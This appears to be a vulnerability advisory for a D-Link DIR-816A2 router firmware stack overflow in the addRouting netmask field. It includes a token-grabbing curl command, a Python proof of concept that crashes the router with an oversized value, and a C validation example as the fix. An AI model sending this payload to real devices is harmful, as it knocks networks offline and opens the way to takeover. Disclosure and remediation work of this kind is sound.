DIR-816A2_FWv1.10CNB05_R1B011D88210.img Stack overflow vulnerability

Overview

Affected version

Below is the latest firmware

Vulnerability details

The vulnerability occurs in /goform/addRouting. The content obtained from the netmask parameter is passed to V3, and the content matched by V3 is then written into the stack buffer V13 without a size check, resulting in a stack overflow.
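The missing check, sketched as an added example (not code from the firmware or from this repository): a netmask field is length-bounded and validated before it is copied into a fixed-size stack buffer. The names `parse_netmask`, `NETMASK_BUF` and `check_oversized` are hypothetical.

```c
#include <arpa/inet.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NETMASK_BUF 16 /* "255.255.255.255" plus the terminating NUL */

/* Hypothetical helper (not firmware code): validate a netmask form field,
 * then copy it into a fixed-size buffer. Returns 0 if accepted, -1 if not. */
int parse_netmask(const char *input, char out[NETMASK_BUF])
{
    struct in_addr addr;
    uint32_t inverted;
    const char *end;

    if (input == NULL)
        return -1;
    /* Bound the length before any copy: search for NUL in the first 16 bytes only. */
    end = memchr(input, '\0', NETMASK_BUF);
    if (end == NULL || end == input)
        return -1;
    /* The value must parse as a dotted-quad IPv4 address. */
    if (inet_pton(AF_INET, input, &addr) != 1)
        return -1;

    /* A netmask is contiguous 1 bits followed by 0 bits, so its
     * complement plus one is either zero or a power of two. */
    inverted = ~ntohl(addr.s_addr);
    if ((inverted & (inverted + 1)) != 0)
        return -1;

    memcpy(out, input, (size_t)(end - input) + 1);
    return 0;
}

/* Constructed input: 10000 'a' bytes, the size used by the PoC on this page. */
int check_oversized(void)
{
    static char big[10001]; /* zero-initialised, so the last byte stays NUL */
    char out[NETMASK_BUF];
    memset(big, 'a', sizeof(big) - 1);
    return parse_netmask(big, out);
}

int main(void)
{
    char out[NETMASK_BUF];
    printf("%d %d\n", parse_netmask("255.255.255.0", out), check_oversized());
    return 0;
}
```

The oversized input is rejected at the length check, before any parsing or copying takes place.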

Vulnerability verification

POC

Get the token ID

curl http://192.168.0.1/dir_login.asp | grep tokenid

Run the PoC

import requests

# Token ID obtained from dir_login.asp in the previous step
tokenid = ''

url = 'http://192.168.0.1/goform/addRouting'

# Oversized value for the netmask parameter
payload = b'a' * 10000

data = {
    'tokenid': tokenid,
    'dest': '1.1.1.1',
    'netmask': payload
}

print('payload sending...')
r = requests.post(url, data)
print('end')

You can see the router crash, and from there an exploit can be written to get a shell.